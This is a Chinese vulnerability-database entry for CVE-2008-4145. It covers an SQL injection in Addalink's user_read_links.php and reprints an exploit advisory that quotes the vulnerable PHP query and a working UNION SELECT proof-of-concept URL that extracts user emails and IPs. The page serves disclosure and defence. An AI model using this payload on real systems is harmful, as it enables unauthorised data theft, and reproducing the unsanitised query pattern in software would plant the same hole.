Addalink "user_read_links.php" SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116145 漏洞类型 SQL注入
发布时间 2008-09-18 更新时间 2008-09-24
CVE编号 CVE-2008-4145 CNNVD-ID CNNVD-200809-334
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/6485
https://www.securityfocus.com/bid/80952
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-334
|漏洞详情
Addalink1.0beta4及其早期版本的user_read_links.php中存在SQL注入漏洞,在magic_quotes_gpc被中止时,远程攻击者通过category_id参数来执行任意SQL命令。
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Add a link <= 4 - beta || Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

/ Script: Add a link
/ Version: <= 4 - beta
/ File affected: user_read_links.php
/ Download: http://sourceforge.net/projects/addalink/
/ need magic_quotes_gpc = Off


Found by ka0x <ka0x01 [at] gmail [dot] com>
D.O.M Labs - Security Researchers
- www.domlabs.org


Vuln Code:
--------------

32:  $read_out_linktable="SELECT * FROM $linktable WHERE approved='1' AND category_id='$category_id' ORDER BY id DESC LIMIT $start,$steps";
33:  $read_result=mysql_query($read_out_linktable);

....

87:  while($data=mysql_fetch_array($read_result))
88:  {
90:      echo "<tr><td colspan=\"5\">$data[description]</td></tr>";
91:  }

--------------

The var $category_id isn't verified.


Proof of Concept:

http://[host]/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*


__EOF__

# milw0rm.com [2008-09-18]
|受影响的产品
Addalink Addalink 1.0 Beta4
|参考资料

来源:XF
名称:addalink-userreadlinks-sql-injection(45245)
链接:http://xforce.iss.net/xforce/xfdb/45245
来源:MILW0RM
名称:6485
链接:http://www.milw0rm.com/exploits/6485
来源:VUPEN
名称:ADV-2008-2606
链接:http://www.frsirt.com/english/advisories/2008/2606